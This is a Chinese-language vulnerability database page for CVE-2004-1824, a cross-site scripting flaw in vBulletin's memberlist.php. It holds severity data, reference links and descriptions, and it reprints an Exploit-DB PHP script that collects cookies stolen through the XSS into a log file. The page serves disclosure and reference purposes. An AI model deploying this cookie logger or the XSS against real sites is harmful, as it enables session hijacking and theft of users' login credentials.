CVE-2004-1824
CVSS4.3
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:01:06
NMCOE    

[原文]Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.0 allows remote attackers to inject arbitrary web script or HTML via the what parameter to memberlist.php.


[CNNVD]JelSoft VBulletin MemberList.PHP跨站脚本攻击(XSS)漏洞(CNNVD-200412-813)

        Jelsoft vBulletin 3.0之前的版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助到memberlist.php的what参数注入任意web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1824
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1824
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-813
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2002-11/0276.html
(UNKNOWN)  BUGTRAQ  20021121 XSS bug in vBulletin
http://marc.info/?l=bugtraq&m=107945556112453&w=2
(UNKNOWN)  BUGTRAQ  20040316 JelSoft vBulletin Multiple XSS Vulnerabilities
http://securitytracker.com/id?1009440
(UNKNOWN)  SECTRACK  1009440
http://www.iss.net/security_center/static/10679.php
(UNKNOWN)  XF  vbulletin-memberlist-xss(10679)
http://www.securityfocus.com/bid/6226
(UNKNOWN)  BID  6226
http://www.securityfocus.com/bid/9887
(UNKNOWN)  BID  9887
http://xforce.iss.net/xforce/xfdb/15495
(UNKNOWN)  XF  vbulletin-showthread-xss(15495)

- 漏洞信息

JelSoft VBulletin MemberList.PHP跨站脚本攻击(XSS)漏洞
中危 跨站脚本
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Jelsoft vBulletin 3.0之前的版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助到memberlist.php的what参数注入任意web脚本或HTML。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22030)

VBulletin 2.0/2.2.x Memberlist.PHP Cross Site Scripting Vulnerability (EDBID:22030)
php webapps
2002-11-22 Verified
0 Sp.IC
N/A [点击下载]
source: http://www.securityfocus.com/bid/6226/info

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.

As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.

<?PHP
      // vBulletin XSS Injection Vulnerability: Exploit
      // ---
      // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
      // Descrption: Fetching vBulletin's cookies and storing it into a
log file.

      // Variables:

      $LogFile = "Cookies.Log";

      // Functions:
      /*
      If ($HTTP_GET_VARS['Action'] = "Log") {
          $Header = "<!--";
          $Footer = "--->";
      }
      Else {

           $Header = "";
           $Footer = "";
      }
      Print ($Header);
      */
      Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
      Print ("<Pre>");
      Print ("<Center>");
      Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
      Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
      /*
      Print ($Footer);
      */

      Switch ($HTTP_GET_VARS['Action']) {
          Case "Log":

                 $Data = $HTTP_GET_VARS['Cookie'];
                 $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
                 $Log = FOpen ($LogFile, "a+");
                         FWrite ($Log, Trim ($Data) . "\n");
                         FClose ($Log);
                         Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
          Break;
                Case "List":
                 If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                     Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
                     Exit ();
                 }
                 Else {
                     Print ("</Center></Pre>");
                     $Records = Array_UniQue (File ($LogFile));
                                  Print ("<Pre>");
                                  Print ("<B>.:: Statics</B>\n");
                     Print ("\n");
                                  Print ("o Logged Records : <B>" . Count
(File ($LogFile)) . "</B>\n");
                     Print ("o Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
                     Print ("\n");

                     Print ("<B>.:: Options</B>\n");
                     Print ("\n");

                     If (Count (File ($LogFile)) > 0) {
                         $Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";
                     }
                     Else{
                         $Link['Download'] = "[No Records in Log]";
                     }

                     Print ("o Download Log : " . $Link
['Download'] . "\n");
                     Print ("o Clear Records : [<A Href=\"" .
$SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
                     Print ("\n");
                     Print ("<B>.:: Records</B>\n");
                     Print ("\n");

                     While (List ($Line[0], $Line[1]) = Each ($Records)) {
                         Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                     }
                 }

                 Print ("</Pre>");
          Break;
          Case "Delete":
              @UnLink ($LogFile);
              Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
              Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
          Break;
      }
    ?>		

- 漏洞信息

4312
vBulletin memberlist.php what Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

vBulletin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "what" variable upon submission to the "memberlist.php" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-03-15 Unknow
2004-03-15 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站